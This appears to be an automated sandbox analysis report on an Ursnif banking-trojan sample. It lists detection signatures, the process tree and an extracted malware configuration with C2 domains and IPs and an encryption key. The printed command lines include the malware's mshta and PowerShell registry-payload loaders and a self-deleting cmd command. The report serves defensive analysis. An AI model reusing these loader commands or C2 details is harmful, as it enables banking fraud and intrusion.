Edit tour
Windows
Analysis Report
zs5n5sI6N2
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 3456 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\zs5 n5sI6N2.dl l" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 6012 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\zs5 n5sI6N2.dl l",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 4452 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\zs5n 5sI6N2.dll ",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 6364 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - explorer.exe (PID: 3616 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 260 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\zs5n5sI6 N2.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5896 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 5988 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 4440 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5) - cmd.exe (PID: 2960 cmdline:
cmd /C "ns lookup myi p.opendns. com resolv er1.opendn s.com > C: \Users\use r\AppData\ Local\Temp \1759.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - WerFault.exe (PID: 3176 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 3 456 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 1800 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 3 456 -s 408 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 5172 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 3 456 -s 436 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 6732 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Cwbm='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Cwbm).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 6824 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name asyt srjo -valu e gp; new- alias -nam e famnsyvw eq -value iex; famns yvweq ([Sy stem.Text. Encoding]: :ASCII.Get String((as ytsrjo "HK CU:Softwar e\AppDataL ow\Softwar e\Microsof t\54E80703 -A337-A6B8 -CDC8-873A 517CAB0E") .UrlsRetur n)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 7156 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\rn2v1u0 v\rn2v1u0v .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 5080 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESBB61.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\rn2 v1u0v\CSCE 8729092494 447E68BAFD 2B3DE7C4FE .TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 5092 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\0rxpcrx p\0rxpcrxp .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6392 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESDBAB.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\0rx pcrxp\CSC8 1748258BEC 6426288BE9 680C960B04 E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{"RSA Public Key": "2FCnIUzdNGgeELQ1eLj0bJoMz6Wyhsxr173krpubnAkBznOw2O4zXiS7ovCR4PNNsCIjegHbTvoHWqhvq9RRNZAEBtDWX6mW3yIDXSN0qA1n8qiSRebn1HxZtuyL6FY/BR1nMcmDUet9iMwvlRDxmj+VzyCObUK6W0DHCUtNCB3pyymvgBuZvmOoqHVPJIhNG61j6VPVajqzr24KUke3teaWIZiCXT2orfIpBZFefRCfYuOYhoPg/LDJjkEBPCd72OAc2ekKwF9Tcjmm1Qm9F8aB637Mj7oTJWG5gIc8figdfCIcJsfVqtjVSAcA29hI94eg/OsMoQ7GmaQR3NS4pkbIWbvv0j+obPcxvU7II18=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 22 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 4 entries |
⊘No Sigma rule has matched
Timestamp: | 192.168.2.413.107.42.1649765802033203 05/25/22-11:27:05.996967 |
SID: | 2033203 |
Source Port: | 49765 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.413.107.42.1649765802033204 05/25/22-11:27:05.996967 |
SID: | 2033204 |
Source Port: | 49765 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.4176.10.119.6849771802033203 05/25/22-11:27:28.182548 |
SID: | 2033203 |
Source Port: | 49771 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.4176.10.119.6849771802033204 05/25/22-11:27:27.011665 |
SID: | 2033204 |
Source Port: | 49771 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 3_2_01005FBB |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 3_2_05B665C2 | |
Source: | Code function: | 3_2_05B699BC | |
Source: | Code function: | 3_2_05B7BAD1 |
Source: | Code function: | 3_2_05B6FD47 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 3_2_01001CA5 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: |
Source: | Code function: | 3_2_01005FBB |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Code function: | 3_2_01004BF1 | |
Source: | Code function: | 3_2_01001645 | |
Source: | Code function: | 3_2_0100829C | |
Source: | Code function: | 3_2_05B83DB0 | |
Source: | Code function: | 3_2_05B7154D | |
Source: | Code function: | 3_2_05B7D7F1 | |
Source: | Code function: | 3_2_05B667CA | |
Source: | Code function: | 3_2_05B7FF4D | |
Source: | Code function: | 3_2_05B6B238 | |
Source: | Code function: | 30_2_007FB4B8 | |
Source: | Code function: | 30_2_007F9660 | |
Source: | Code function: | 30_2_007FEEF8 | |
Source: | Code function: | 30_2_008198A8 | |
Source: | Code function: | 30_2_008180A8 | |
Source: | Code function: | 30_2_00802830 | |
Source: | Code function: | 30_2_00817850 | |
Source: | Code function: | 30_2_00801864 | |
Source: | Code function: | 30_2_007F716C | |
Source: | Code function: | 30_2_008151A8 | |
Source: | Code function: | 30_2_0080B9E0 | |
Source: | Code function: | 30_2_007F5110 | |
Source: | Code function: | 30_2_007F410C | |
Source: | Code function: | 30_2_0080E120 | |
Source: | Code function: | 30_2_00818AC0 | |
Source: | Code function: | 30_2_00812AD8 | |
Source: | Code function: | 30_2_0081C220 | |
Source: | Code function: | 30_2_00804240 | |
Source: | Code function: | 30_2_00801248 | |
Source: | Code function: | 30_2_008173EC | |
Source: | Code function: | 30_2_00806CA4 | |
Source: | Code function: | 30_2_008134C0 | |
Source: | Code function: | 30_2_007F3C3C | |
Source: | Code function: | 30_2_0081D4D4 | |
Source: | Code function: | 30_2_007FD404 | |
Source: | Code function: | 30_2_007F34D8 | |
Source: | Code function: | 30_2_00812428 | |
Source: | Code function: | 30_2_0081AC50 | |
Source: | Code function: | 30_2_0080C46C | |
Source: | Code function: | 30_2_00817DB4 | |
Source: | Code function: | 30_2_007F9D1C | |
Source: | Code function: | 30_2_0080CD1C | |
Source: | Code function: | 30_2_00810530 | |
Source: | Code function: | 30_2_00815684 | |
Source: | Code function: | 30_2_0080BED0 | |
Source: | Code function: | 30_2_00802EE8 | |
Source: | Code function: | 30_2_00811638 | |
Source: | Code function: | 30_2_007F1EA8 | |
Source: | Code function: | 30_2_00811E5C | |
Source: | Code function: | 30_2_00808670 | |
Source: | Code function: | 30_2_007F572C | |
Source: | Code function: | 30_2_0081772C | |
Source: | Code function: | 30_2_00804F5C | |
Source: | Code function: | 30_2_00806F78 |
Source: | Code function: | 3_2_05B78E57 |
Source: | Code function: | 3_2_01006D0A | |
Source: | Code function: | 3_2_0100190C | |
Source: | Code function: | 3_2_01004321 | |
Source: | Code function: | 3_2_010084C1 | |
Source: | Code function: | 3_2_05B76DE0 | |
Source: | Code function: | 3_2_05B674AE | |
Source: | Code function: | 3_2_05B6C431 | |
Source: | Code function: | 3_2_05B70782 | |
Source: | Code function: | 3_2_05B7BE80 | |
Source: | Code function: | 3_2_05B761AE | |
Source: | Code function: | 3_2_05B6710A | |
Source: | Code function: | 3_2_05B77950 | |
Source: | Code function: | 3_2_05B700DC | |
Source: | Code function: | 3_2_05B7A806 | |
Source: | Code function: | 3_2_05B72331 | |
Source: | Code function: | 3_2_05B75312 | |
Source: | Code function: | 3_2_05B664C4 | |
Source: | Code function: | 3_2_05B6B7D5 | |
Source: | Code function: | 3_2_05B6D77A | |
Source: | Code function: | 3_2_05B636BB | |
Source: | Code function: | 3_2_05B610C7 | |
Source: | Code function: | 3_2_05B73829 | |
Source: | Code function: | 3_2_05B7EAC5 | |
Source: | Code function: | 3_2_05B75220 | |
Source: | Code function: | 30_2_0080583C | |
Source: | Code function: | 30_2_007F40C0 | |
Source: | Code function: | 30_2_008041D8 | |
Source: | Code function: | 30_2_0081A148 | |
Source: | Code function: | 30_2_007FAA6C | |
Source: | Code function: | 30_2_008104CC | |
Source: | Code function: | 30_2_007F6D24 | |
Source: | Code function: | 30_2_007F65E4 | |
Source: | Code function: | 30_2_007F9660 | |
Source: | Code function: | 30_2_0082F002 |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: |
Source: | Code function: | 3_2_010068BD |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 3_2_0100829B | |
Source: | Code function: | 3_2_01007EA9 | |
Source: | Code function: | 3_2_05B83DAF | |
Source: | Code function: | 3_2_05B63496 | |
Source: | Code function: | 3_2_05B838A9 | |
Source: | Code function: | 30_2_00814493 |
Source: | Static PE information: |
Source: | Code function: | 3_2_05B6EC00 |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 3_2_05B665C2 | |
Source: | Code function: | 3_2_05B699BC | |
Source: | Code function: | 3_2_05B7BAD1 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 3_2_05B6FD47 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 3_2_05B6EC00 |
Source: | Process token adjusted: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 3_2_05B68FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | |||
Source: | Memory written: |
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
